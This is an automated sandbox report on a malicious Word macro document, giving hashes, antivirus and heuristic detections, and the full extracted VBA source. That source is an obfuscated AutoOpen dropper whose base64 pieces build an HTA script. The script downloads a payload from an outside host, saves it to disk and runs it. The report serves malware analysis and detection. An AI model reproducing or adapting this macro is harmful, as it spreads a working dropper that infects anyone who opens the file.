Office (OOXML) malware analysis — malicious · 1843c2bc9d93bca3

MALICIOUS

Office (OOXML)

92.6 KB Created: 2020-12-11 09:40:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-12-25

MD5: 586780a37a7d35e41e8acec9df1dfd07 SHA-1: 94d36824b5e8b13c35f5e138c61cccb5eabacfa6 SHA-256: 1843c2bc9d93bca343709c0ee29f559a3ed4356e97eb7f39933942d5130f56f6

172 Risk Score

Heuristics 7

ClamAV: Doc.Dropper.Generic-9823794-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Generic-9823794-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set aUE7Iw = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	9656 bytes
SHA-256: `6526f638ed3db9f00e98eddaeac8a15d954bfdb6ed4111d47e77c8b746a5897d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "aDLaN4" Sub AutoOpen() aaFNS End Sub Attribute VB_Name = "amjk3" Sub aIpit(aqc3e, ashpOa) ' Uncover somersault aluminum probe puma ' Appearance unction ' Strings provocative value ' Earldom ' Eliminate gland ' Eds universities william ' Swirling ' Savor tainted ' Faster cisco hinge ' Indian expiate med ' Realistic bewitching cropping all-embracing intention ' Airports cancer practitioner ' Programmer prefect ' Solutions offense ' Filipino investment ' Procedures fortune ' Img jessica mishap fort ' Hometown dx savior wrack ' Assailant continental ' Ba ipaq basis ' Lolita recipe monumental cricket loan ' Sash hiatus sa ' Drums rave fatality instances draft ' Mozilla ups ' Accented cupidity moss ' Drought totality oct ' Appliances bowling End Sub Attribute VB_Name = "aVpaI" Public Const aOBZCw As String = "21232f297a57a5a743894a0e4a801fc3" Public Const aWiEfe As String = "utf-8" Function amaLIb(aZheq) ' Finn evanescence splinter ' Precision ' Serb vid galleon chipped maternity a1ZuG = 1 apjyB = Len(aZheq) a5Uav = "" ' Threadbare weathercock taper garage ' British violin dumbfounded ' Consanguinity headers zus ' Xhtml daughter-in-law ethereal well-bred output play For aY6ob = 1 To apjyB a5Uav = Mid(aZheq, aY6ob, 1) & a5Uav ' Wherewithal prickly precise oddity phillips ' Sense xhtml has hundredweight ' Delayed harmful duncan ' Feel Next aY6ob ' Roulette tuscany morris ' Strand quick ' Longer beds candidacy ' Sardonic decadence ' Market linux frigid ' Incomparable entering pizza ' Awful forthright sleigh projects nascent ' Insinuation necessarily clamor commensurate amaLIb = a5Uav End Function Function auZIzw(aGrtXJ) Set aUE7Iw = CreateObject(amaLIb("e" & "gas" & "sem.odc")) With aUE7Iw.BodyPart .ContentTransferEncoding = amaLIb("46e" & "sab") With .GetEncodedContentStream .WriteText aGrtXJ .Flush End With With .GetDecodedContentStream .Charset = aWiEfe auZIzw = .ReadText End With End With ' Usr assess hinting endangered ingrained ' Header ' Revenue incorporate re jumping ' Windfall centralization ' Photographic dozens ' Phantasy irksome ' Utc blonde bier gambling ' Translating dullness thereafter ' Massage density interviews singles frugal mask ' Valparaiso governments present-day ' Allowing hellenic End Function Sub a6pB2w(aQNSBE, aJOEN) ' Halifax ' Detroit grants assessed rug ' Stick phoenician sport bairn deterioration ' Fraternal brands ' Adobe opponents pc ensemble eh trailers ' Modeling canvass ' Forestry surname contralto ' Watched stick flour broadcast ' Shed golly brilliant onslaught lascivious ' Owned sward ' Territory hence modified academy ' Appeared gable assault chronological ' Dualism joyance antiquarian ' Township taboo blister judgment shapes Open aQNSBE For Output As #1 Print #1, aJOEN ' Modules performances posterior ' Threshing purr murky avowal ' Bumper motorcycle nationally ' Intermission brittle lovable warm olympic Close #1 End Sub Function Des(aNFKD, atuyvS, aI0MqN) ' Nato jet-black ' Heretical raises spaulding holes ' Theory contrition ye vishnu Des = Replace(auZIzw(aNFKD), atuyvS, aI0MqN) End Function Sub aaFNS() ayvJjk = Des("Y2FONnNtOmFONnNtXGFONnNtd2FONnNtaWFONnNtbmFONnNtZGFONnNtb2FONnNtd2FONnNtc2FONnNtXGFONnNtc2FONnNteWFONnNtc2FONnNtdGFONnNtZWFONnNtbWFONnNtM2FONnNtMmFONnNtXGFONnNtbWFONnNtc2FONnNtaGFONnNtdGFONnNtYWFONnNtLmFONnNtZWFONnNteGFONnNtZWFONnNt", "aN6sm", "") ' Skeptical swain hallowed crude ' Harem uninformed clamorous mythical sharpen travels ' Pedagogue leads origination voluptuousness ameEU = Des("Y2FBQzdSOmFBQzdSXGFBQzdSdWFBQzdSc2FBQzdSZWFBQzdScmFBQzdSc2FBQzdSXGFBQzdScGFBQzdSdWFBQzdSYmFBQzdSbGFBQzdSaWFBQzdSY2FBQzdSXGFBQzdScGFBQzdSdWFBQzdSYmFBQzdSbGFBQzdSaWFBQzdSY2FBQzdSLmFBQzdSY2FBQzdSb2FBQzdSbWFBQzdS", "aAC7R", "") ' Wang vagaries constituent reductions agent ' Amongst mechanics ' Promised tartar affected handicap a6Lp0f = Des("Y2FMbDkyOmFMbDkyXGFMbDkydWFMbDkyc2FMbDkyZWFMbDkycmFMbDkyc2FMbDkyXGFMbDkycGFMbDkydWFMbDkyYmFMbDkybGFMbDkyaWFMbDkyY2FMbDkyXGFMbDkyaWFMbDkybmFMbDkyZGFMbDkyZWFMbDkyeGFMbDkyLmFMbDkyaGFMbDkydGFMbDkyYWFMbDky", "aLl92", "") a5hy3P = Des("cmFhcmJaNXVhYXJiWjVuYWFyYlo1ZGFhcmJaNWxhYXJiWjVsYWFyYlo1M2FhcmJaNTJhYXJiWjUuYWFyYlo1ZWFhcmJaNXhhYXJiWjVlYWFyYlo1IGFhcmJaNXVhYXJiWjVyYWFyYlo1bGFhcmJaNS5hYXJiWjVkYWFyYlo1bGFhcmJaNWxhYXJiWjUsYWFyYlo1T2FhcmJaNXBhYXJiWjVlYWFyYlo1bmFhcmJaNVVhYXJiWjVSYWFyYlo1TGFhcmJaNQ==", "aarbZ5", "") ' Trains torpedo azerbaijan ' Designation playing lucas forces ' Yule ' Tournament razor kurt naughty ' Aurora prevention accepting nutshell ' Visual minimal motherless virginity ' Portland polemical miscellaneous ' Hilarity robust aL9ag6 = "0oYUJKMGMgKyAiMzIgIiArIGF1a3htSSArIGFEdzJtayk7DQp3aW5kb3cuY2xvc2Uo" ' Authorization ' Hosting weak clarity ' Willy cities dyou vienna titans focuses ' Importation scramble proverbial spas agK2AD = "VuDQoJYVdhbk8uVHlwZSA9IDENCglhV2FuTy5Xcml0ZSBhNXBUOC5yZXNwb25zZWJv" a6HZfF = "QgSWYNCg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQi" ' Shipment gangrene pyramids sulky ' Type mickle delhi bush ' Imperceptibly corresponding ' Acuteness worthy goods powered a5Zzl = "dCBhV2FuTyA9IENyZWF0ZU9iamVjdCgiYWRvZGIuc3RyZWFtIikNCglhV2FuTy5PcG" ' Doom calculator purchased dawns ' Opposition read untenable emergency unfathomable detecting ' Efface destroy comparable kernel ' Organised red a86Vo = "AiKTsNCmE1cFQ4Lm9wZW4oIkdFVCIsICJodHRwOi8vY3N0bGVhZGFwdDMuY29tL2Zv" a76UVI = "Cg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9InZic2NyaXB0Ij4NCg0KYU" ' Undergraduate ' Does modes ' Forty ' Gras infatuation eddie five aWxs5h = "MCk7DQp2YXIgYTVwVDggPSBuZXcgQWN0aXZlWE9iamVjdCgibXN4bWwyLnhtbGh0dH" ' Float dot ' Rebus robert delay altruistic visitors blatant gig ' Communist ' Divx perspicacity a46iwj = "Z3J2Wnc9S3pxSUVZY0t0JkNteEpEPUtJSU1RT3NPQVlyWEZwaiZtbExlbj1QYkNoem" ' Unique evaluation ordinance allocated vineyard ' Rigour ' Saucer bottom helpful waken ' Sector hudson grime aIVOA = "ZHkNCglhV2FuTy5TYXZlVG9GaWxlIGF1a3htSSwgMg0KCWFXYW5PLkNsb3NlDQpFbm" aH384P = "5aJnFzTko9S0tiYlpYR09nVUdUcldfeiIsIGZhbHNlKTsNCmE1cFQ4LnNlbmQoKTsN" ' Application ' Calendar transverse coolie antechamber transgress ' Penmanship snow satisfactory ' Hindostan sobriety probability afbtv = "cnVtL3ZpZXdwb3N0bng1N1I2ZWdPYkE1ZWhVRFJVMV9ZRDFfaVZfenYwVUpjbEJyb0" ' Peach lover fighting mach ' Mutilation ven iodine ' Island inkstand cobra ' Briton aides curve dastardly discount ab5EJ = "sNCg0Kd2luZG93LnJlc2l6ZVRvKDEsIDEpOw0Kd2luZG93Lm1vdmVUbygtMTAsIC0x" aqtJF = "R3Mm1rID0gInItIEFnb2xhaUR3b2hTLCIuc3BsaXQoIiIpLnJldmVyc2UoKS5qb2lu" ' Equanimity jaunty ' Perfect ' Bc ' Hellas tournaments books wend isp aCQRBn = "dkxvcyA9ICJudXIiLnNwbGl0KCIiKS5yZXZlcnNlKCkuam9pbigiIik7DQp2YXIgYU" anrim = "Pg0KDQp2YXIgYVd6cVZGID0gbmV3IEFjdGl2ZVhPYmplY3QoYWFjVjApW2F5dkxvc1" ' Teenage ppm ' Earn bath remix snap subservient ' Cumulative dictator charger oriental ' Ou passage lancet axNK7 = "l5X01rUUpfNFNwYm1Uc3BJMUJtQTNaVFZWU1g3UEJiVVkwV1VUbnQvZmZzbGFleTg/" aioslg = "JKMGMgPSAicnVuZGxsIg0KDQpJZiBhNXBUOC5zdGF0dXMgPSAyMDAgVGhlbg0KCVNl" ahRYZ = "KCIiKTsNCnZhciBhdWt4bUkgPSAiYzpcXHByb2dyYW1kYXRhXFxhSlVmUFMucGRmIj" ' Change ho ' Mercedes passenger entrepreneur heifer hard-headed ' Flatterer auction delineate synthetic var individuals ' Stimulant lat detection brought panel ach8C = "KTsNCg0KPC9zY3JpcHQ+" aT82Rg = "Vocy50cGlyY3N3Ii5zcGxpdCgiIikucmV2ZXJzZSgpLmpvaW4oIiIpOw0KdmFyIGF5" al9Og = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQoNCnZhciBhYWNWMCA9ICJsbG" aJOEN = auZIzw(al9Og & aT82Rg & aCQRBn & aqtJF & ahRYZ & ab5EJ & aWxs5h & a86Vo & afbtv & axNK7 & a46iwj & aH384P & a76UVI & aioslg & a5Zzl & agK2AD & aIVOA & a6HZfF & anrim & aL9ag6 & ach8C) a6pB2w a6Lp0f, aJOEN ' Conditional intended ' Embryo treadmill dim ' Prayers comp huddle anvil ' Task ' Administrators negress piecemeal physiological ' Trepidation ' Quire ir at ' Toys sonorous capitulation ' Bracket vaccine sleek promenade ' Carp ' Lessons brewed ' Export ' Teas registered humanitarian analyzed passable ' Analyze suffering ' Staunch intensify jo dexterous ' Arms antenna jean ' Deny playing malthus desk ' Contact sedimentary pertinent temple effectively mh ' Tennis bevis communist thinking ' Firefox dietary romania daunt my wriggle ' Counters thou breaking deputation ' Prerequisite mixture portsmouth cd Word leon fridge ' Importantly analyse ' Elvis utilization ' Veterinary ' Faithfulness exchanges obeisance exasperation trumps moms aaUGtC = Des("d2FpaHVMTXNhaWh1TE1jYWlodUxNcmFpaHVMTWlhaWh1TE1wYWlodUxNdGFpaHVMTS5haWh1TE1zYWlodUxNaGFpaHVMTWVhaWh1TE1sYWlodUxNbGFpaHVMTQ==", "aihuLM", "") CreateObject(aaUGtC).run (a5hy3P & " " & a6Lp0f) End Sub Attribute VB_Name = "aChxWo" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False ' Registrar umbrellas jazz mahdi performing ' Tripe strip ' Failures selections fighters maritime cramp ' Points will milestone Function azVcvA(auVZD) ' Possible comment zambia ' Specs diablo wake ' Abe dissemble End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	37888 bytes
SHA-256: `628720fe62104d949b3b97058b002aeff11d3f1a44994d9f466b5f21de3a9d63`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.